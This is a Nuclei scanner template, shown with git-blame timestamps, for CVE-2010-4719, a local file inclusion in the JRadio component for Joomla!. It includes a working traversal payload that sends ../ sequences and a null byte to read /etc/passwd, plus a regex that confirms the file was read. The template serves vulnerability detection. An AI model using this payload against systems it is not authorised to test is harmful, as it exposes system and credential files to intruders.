my-nuclei-templates/CVE-2010-4719.yaml

35 lines
1.0 KiB
YAML
Raw Normal View History

2021-11-09 22:49:13 +00:00
id: CVE-2010-4719
info:
name: Joomla! Component JRadio - Local File Inclusion
author: daffainfo
severity: high
2022-06-18 08:05:25 +00:00
description: A directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
2021-11-09 22:49:13 +00:00
reference:
- https://www.exploit-db.com/exploits/15749
- https://www.cvedetails.com/cve/CVE-2010-4719
2022-06-18 08:05:25 +00:00
- http://packetstormsecurity.org/files/view/96751/joomlajradio-lfi.txt
- http://www.exploit-db.com/exploits/15749
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-4719
2021-11-09 22:49:13 +00:00
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
2022-06-18 08:05:25 +00:00
- "root:.*:0:0:"
2021-11-09 22:49:13 +00:00
- type: status
status:
2022-06-18 08:05:25 +00:00
- 200
# Enhanced by mp on 2022/02/17